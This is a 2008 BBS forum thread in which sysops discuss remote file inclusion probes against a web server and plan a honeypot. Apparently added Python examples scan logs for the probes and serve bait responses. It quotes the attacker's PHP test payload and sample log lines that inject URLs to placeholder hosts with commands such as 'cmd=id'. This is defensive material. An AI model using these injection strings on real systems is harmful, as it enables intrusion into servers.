• Exploit?

    From Angus McLeod@VERT/ANJO to All on Saturday, January 19, 2008 11:16:00
    There's a guy who comes around periodically and fiddles with my webserver.
    He's definitely up to no good, because he tools around until he finds a
    CGI program and tries injecting URLs to scripts on Russian (or Taiwanese)
    servers into the argument list of such CGIs.

    The server alerts me whenever he appears. Generally speaking, I just let
    him enjoy himself, since he's not getting anywhere.

    But one thing I can't quite figure out is why he's doing it. He keeps
    trying to view/execute the object '&' in various directories. So I keep
    getting "File does not exist" errors in all the various directories on the
    site. Sort of like:

    File does not exist: /var/www/htdocs/this/directory/&
    File does not exist: /var/www/htdocs/that/directory/&
    File does not exist: /var/www/htdocs/some/other/directory/&

    Anybody recognise this? I suspect that he is attempting to drop something
    on my server named '&' by way of a broken CGI script, and then execute it.
    He's tried injecting several URLs, some of which are 404 but the rest all
    return this script:

    <?php echo md5("just_a_test");?>

    Obviously, if this works, the real payload will follow. It strikes me
    that I should deliberately insert this test script in a few directories,
    name it '&' and wait for him to try again in a few days, or weeks. When
    he gets back his expected response, he will then try with the URL to the
    *real* exploit, and maybe we can get a copy of that!

    Wotcha think?

    ---
    Playing: "Take the money & run" by "The Steve Miller Band"
    from the "Fly like an eagle" album.
    þ Synchronet þ With my ISP it's the InterNOT at The ANJO BBS
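The two things the post describes, absolute URLs injected into a CGI's argument list and repeated requests for a literal '&' object, are both easy to pull out of an Apache access log. The following is an added example, not code from the original post: a small scanner over combined-format log lines that tags each request as an RFI probe, an '&' request, or neither, and collects the injected URLs per client. The log lines and the hostnames in them are constructed for the example.

```python
"""Scan Apache combined-format access-log lines for the two probe patterns the
thread describes: absolute URLs injected into the query string of a CGI or PHP
script (a remote file inclusion probe) and requests for a literal '&' object
inside a directory.  Added example, not from the original post; the log lines
are constructed and the hostnames in them are placeholders.
"""
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# client ident user [time] "METHOD target proto" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

REMOTE_SCHEMES = ("http://", "https://", "ftp://")


def remote_params(target):
    """(name, value) pairs in the query string whose value is a URL on another host."""
    query = urlsplit(target).query
    return [(name, value) for name, value in parse_qsl(query, keep_blank_values=True)
            if value.strip().lower().startswith(REMOTE_SCHEMES)]


def classify(line):
    """Return a dict describing the probe, or None for an unremarkable request."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = m.group("target")
    path = unquote(urlsplit(target).path)   # %26 and a literal & look the same
    tags = []
    if path.endswith("/&"):
        tags.append("amp-object")
    rfi = remote_params(target)
    if rfi:
        tags.append("rfi-probe")
    if not tags:
        return None
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "target": target,
        "status": int(m.group("status")),
        "tags": tags,
        "remote_urls": [value for _, value in rfi],
    }


def scan(lines):
    """Classify every line and keep only the ones that are probes."""
    return [hit for hit in (classify(line) for line in lines) if hit]


def urls_by_client(hits):
    """Group the injected URLs per client IP: the list to fetch from an isolated host."""
    out = {}
    for hit in hits:
        out.setdefault(hit["ip"], set()).update(hit["remote_urls"])
    return out


# Constructed sample, shaped like the requests described in the thread.
SAMPLE_LOG = [
    '203.0.113.7 - - [19/Jan/2008:11:02:13 +0000] "GET /cgi-bin/guest.cgi?page=http://scanner.example/test.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    '203.0.113.7 - - [19/Jan/2008:11:02:14 +0000] "GET /this/directory/& HTTP/1.1" 404 287 "-" "Mozilla/4.0"',
    '198.51.100.20 - - [19/Jan/2008:11:05:01 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [19/Jan/2008:11:06:40 +0000] "GET /that/directory/%26 HTTP/1.1" 404 287 "-" "Mozilla/4.0"',
    '203.0.113.7 - - [19/Jan/2008:11:07:02 +0000] "GET /cgi-bin/view.cgi?f=HTTP://scanner.example/id.txt?&cmd=id HTTP/1.1" 200 40 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ip"], hit["status"], ",".join(hit["tags"]), hit["target"])
    print(urls_by_client(scan(SAMPLE_LOG)))
```

The scheme check is case-insensitive because scanners vary the case of "http" to slip past naive filters, and the path is URL-decoded so a request for `%26` is counted with the literal `&` ones. Anything collected by `urls_by_client` is attacker-controlled; fetch it from a throwaway host, never from the web server itself.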
  • From Ralph Smole@VERT/NIMBUS to Angus McLeod on Saturday, January 19, 2008 12:07:00
    Re: Exploit?
    By: Angus McLeod to All on Sat Jan 19 2008 11:16 am

    There's a guy who comes around periodically and fiddles with my webserver.
    He's definitely up to no good, because he tools around until he finds a
    CGI program and tries injecting URLs to scripts on Russian (or Taiwanese)
    servers into the argument list of such CGIs.

    The server alerts me whenever he appears. Generally speaking, I just let him enjoy himself, since he's not getting anywhere.

    But one thing I can't quite figure out is why he's doing it. He keeps
    trying to view/execute the object '&' in various directories. So I keep
    getting "File does not exist" errors in all the various directories on the
    site. Sort of like:

    File does not exist: /var/www/htdocs/this/directory/&
    File does not exist: /var/www/htdocs/that/directory/&
    File does not exist: /var/www/htdocs/some/other/directory/&

    Anybody recognise this? I suspect that he is attempting to drop something
    on my server named '&' by way of a broken CGI script, and then execute it.
    He's tried injecting several URLs, some of which are 404 but the rest all
    return this script:

    <?php echo md5("just_a_test");?>

    Obviously, if this works, the real payload will follow. It strikes me
    that I should deliberately insert this test script in a few directories,
    name it '&' and wait for him to try again in a few days, or weeks. When
    he gets back his expected response, he will then try with the URL to the
    *real* exploit, and maybe we can get a copy of that!

    Wotcha think?


    Track him down and dispatch him with extreme prejudice.

    Dirty Jack Rackham...A.K.A: Ralph Smole
    www.bullishmcgee.com
    www.ralphsmole.com
    nimbus.synchro.net



    ---
    þ Synchronet þ The Nimbus BBS: nimbus.synchro.net AND www.freewebs.com/ralphsmole
  • From Death@VERT/DARKNESS to Angus McLeod on Saturday, January 19, 2008 17:38:00

    Obviously, if this works, the real payload will follow. It strikes me
    that I should deliberately insert this test script in a few directories,
    name it '&' and wait for him to try again in a few days, or weeks. When
    he gets back his expected response, he will then try with the URL to the
    *real* exploit, and maybe we can get a copy of that!
    Wotcha think?

    Hell Angus, go for it. Apparently whoever is doing this isn't smart
    enough to do it on his own anyhow, and if it "worked", he would
    probably shit himself.. ;o)

    Terry


    ---
    þ Synchronet þ Darkness BBS - darkness.synchro.net
  • From Angus McLeod@VERT/ANJO to Death on Saturday, January 19, 2008 23:29:00
    Re: Exploit?
    By: Death to Angus McLeod on Sat Jan 19 2008 17:38:00

    Obviously, if this works, the real payload will follow. It strikes me
    that I should deliberately insert this test script in a few directories,
    name it '&' and wait for him to try again in a few days, or weeks. When
    he gets back his expected response, he will then try with the URL to the
    *real* exploit, and maybe we can get a copy of that!
    Wotcha think?

    Hell Angus, go for it. Apparently whoever is doing this isn't smart
    enough to do it on his own anyhow, and if it "worked", he would
    probably shit himself.. ;o)

    See, even if he *could* dump some PHP exploit code on my system in a file
    named '&', how does he expect to get it executed? The PHP interpreter
    isn't going to RUN the script unless it is named with a .php extension, is
    it? All that would happen is that the server sends him his own exploit
    script back again!



    ---
    Playing: "A little something" by "Crash Test Dummies"
    from the "Give yourself a hand" album.
    þ Synchronet þ With my ISP it's the InterNOT at The ANJO BBS
  • From Death@VERT/DARKNESS to Angus McLeod on Sunday, January 20, 2008 22:08:00

    See, even if he *could* dump some PHP exploit code on my system in a file
    named '&', how does he expect to get it executed? The PHP interpreter
    isn't going to RUN the script unless it is named with a .php extension, is
    it? All that would happen is that the server sends him his own exploit
    script back again!

    Which would be gut-bustingly funny.. And as far as I know, it would
    HAVE to be &.php to actually be executed..

    Terry


    ---
    þ Synchronet þ Darkness BBS - darkness.synchro.net
  • From Tracker1@VERT/TRN to Angus McLeod on Thursday, January 24, 2008 05:41:00
    On 1/19/2008 8:29 PM, Angus McLeod wrote:
    See, even if he *could* dump some PHP exploit code on my system in a file
    named '&', how does he expect to get it executed? The PHP interpreter
    isn't going to RUN the script unless it is named with a .php extension, is
    it? All that would happen is that the server sends him his own exploit
    script back again!

    I'm guessing that the script is looking for some other exploit to be in
    place, or a flaw in Apache or an ISAPI module... you don't seem to be
    affected by this, but it's always an interesting curiosity that follows...
    I don't check my logs nearly as often as I should.. usually see tons of
    tests for exploits in older versions of IIS on this end... not sure how
    many people are running old versions of IIS3-5 on unpatched NT4/Win2000
    boxes though...

    --
    Michael J. Ryan - tracker1(at)theroughnecks(dot)net - www.theroughnecks.net icq: 4935386 - AIM/AOL: azTracker1 - Y!: azTracker1 - MSN/Win: (email)

    ... FRA #261: A wealthy man can afford anything except a conscience.

    ---
    þ Synchronet þ theroughnecks.net - you know you want it
  • From Angus McLeod@VERT/ANJO to Tracker1 on Thursday, January 24, 2008 20:34:00
    Re: Re: Exploit?
    By: Tracker1 to Angus McLeod on Thu Jan 24 2008 05:41:00

    I'm guessing that the script is looking for some other exploit to be in
    place, or a flaw in Apache or an ISAPI module... you don't seem to be
    affected by this, but it's always an interesting curiosity that follows...
    I don't check my logs nearly as often as I should.. usually see tons of
    tests for exploits in older versions of IIS on this end... not sure how
    many people are running old versions of IIS3-5 on unpatched NT4/Win2000
    boxes though...

    So what I could do is execute his exploit test, capture the output, and
    serve it when he requests the "&" file. He ought to be getting back
    exactly what he would expect if the code ran. That should trigger his
    attempt to drop a real payload on the box, which would let me retrieve
    his exploit package and, uh, exploit it?



    ---
    Playing: "Time ago" by "Black Lab" from the "Your Body Above Me" album.
    þ Synchronet þ With my ISP it's the InterNOT at The ANJO BBS
  • From k5jat@VERT/K5JATBBS to Angus McLeod @QWKNET*67 on Thursday, January 24, 2008 19:36:00
    Re: Re: Exploit?
    By: Tracker1 to Angus McLeod on Thu Jan 24 2008 05:41:00

    I'm guessing that the script is looking for some other exploit to be in
    place, or a flaw in Apache or an ISAPI module... you don't seem to be
    affected by this, but it's always an interesting curiosity that follows...
    I don't check my logs nearly as often as I should.. usually see tons of
    tests for exploits in older versions of IIS on this end... not sure how
    many people are running old versions of IIS3-5 on unpatched NT4/Win2000
    boxes though...

    So what I could do is execute his exploit test, capture the output, and
    serve it when he requests the "&" file. He ought to be getting back
    exactly what he would expect if the code ran. That should trigger his
    attempt to drop a real payload on the box, which would let me retrieve
    his exploit package and, uh, exploit it?


    Sounds like he's looking for a cross-site scripting vulnerability, so they
    can inject all sorts of crap. To go along with the '&' file, just make it
    a text file with just_a_test in it and name it '&', and stick it out in a
    directory. It should fool them into thinking their test *worked*. Should
    be funny to see what happens then.

    Just my $.0002 worth. :)

    Jay

    --
    [K5JAT BBS] -- [telnet://bbs.k5jat.com] -- [http://bbs.k5jat.com]
  • From Angus McLeod@VERT/ANJO to k5jat on Thursday, January 24, 2008 23:19:00
    Re: Re: Exploit?
    By: k5jat to Angus McLeod @QWKNET*67 on Thu Jan 24 2008 19:36:00

    To go along with the '&' file, just make it a text file with
    just_a_test in it and name it '&', and stick it out in a directory. It
    should fool them into thinking their test *worked*. Should be funny to
    see what happens then.

    Well, I'd have to put the MD5 of it in the text-file, but essentially yes,
    that's what I was thinking. And when he tries to run an exploit, I can
    grab the exploit code and try to see what it's doing.

    ---
    Playing: "Gospel plow" by "Screaming Trees" from the "Dust" album.
    þ Synchronet þ With my ISP it's the InterNOT at The ANJO BBS
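The bait the thread settles on, a '&' object that answers with exactly what the attacker's test script would have printed, is simple enough that a static file holding the 32 hex characters of md5("just_a_test") does the job. What a file cannot do is record the URL of the follow-up payload. The following is an added example, not the poster's code: a small WSGI application that serves the expected digest for any path ending in `/&`, answers everything else with a 404 like the real server, and logs every remote URL that shows up in a query string so it can be fetched and read later. The WSGI layout, the `captured` list and the request dictionaries are assumptions made for the example.

```python
"""Honeypot responder for the '&' probe described in the thread.  Added example,
not the poster's code.  Any request for .../& gets the output the attacker's
test script would print (the MD5 of "just_a_test"); everything else is a 404.
Remote URLs seen in query strings are recorded for later, offline inspection.
"""
import hashlib
from urllib.parse import parse_qsl, unquote

REMOTE_SCHEMES = ("http://", "https://", "ftp://")

# (client address, requested path, injected URL) tuples; assumed capture format.
captured = []


def expected_test_output():
    """What <?php echo md5("just_a_test");?> prints: 32 lowercase hex chars, no newline."""
    return hashlib.md5(b"just_a_test").hexdigest()


def remote_urls(query):
    """Query-string values that point at another host, i.e. the injected URLs."""
    return [value for _, value in parse_qsl(query, keep_blank_values=True)
            if value.strip().lower().startswith(REMOTE_SCHEMES)]


def honeypot_app(environ, start_response):
    """WSGI application: bait response for '&', 404 otherwise, capture on every request."""
    path = unquote(environ.get("PATH_INFO", ""))   # scanners may send %26 for &
    query = environ.get("QUERY_STRING", "")
    addr = environ.get("REMOTE_ADDR", "?")
    for url in remote_urls(query):
        captured.append((addr, path, url))
    if path.endswith("/&"):
        body = expected_test_output().encode("ascii")
        start_response("200 OK", [("Content-Type", "text/html"),
                                  ("Content-Length", str(len(body)))])
        return [body]
    body = b"File does not exist\n"
    start_response("404 Not Found", [("Content-Type", "text/plain"),
                                     ("Content-Length", str(len(body)))])
    return [body]


def handle(environ):
    """Drive the app without a socket; returns (status, body) for inspection."""
    state = {}

    def start_response(status, headers, exc_info=None):
        state["status"] = status
        state["headers"] = headers

    body = b"".join(honeypot_app(environ, start_response))
    return state["status"], body


if __name__ == "__main__":
    # Constructed requests in the shape of the probes the thread describes.
    print(handle({"PATH_INFO": "/this/directory/&", "QUERY_STRING": "",
                  "REMOTE_ADDR": "203.0.113.7"}))
    print(handle({"PATH_INFO": "/cgi-bin/guest.cgi",
                  "QUERY_STRING": "page=http://scanner.example/shell.txt?",
                  "REMOTE_ADDR": "203.0.113.7"}))
    print(captured)
    from wsgiref.simple_server import make_server
    make_server("127.0.0.1", 8080, honeypot_app).serve_forever()
```

The response body is the bare digest with no trailing newline, because that is what PHP's `echo` would have produced and a scanner that compares the body byte for byte will reject anything else. Run it only on a host that holds nothing of value, and treat whatever lands in `captured` as hostile input to be fetched and read on an isolated machine.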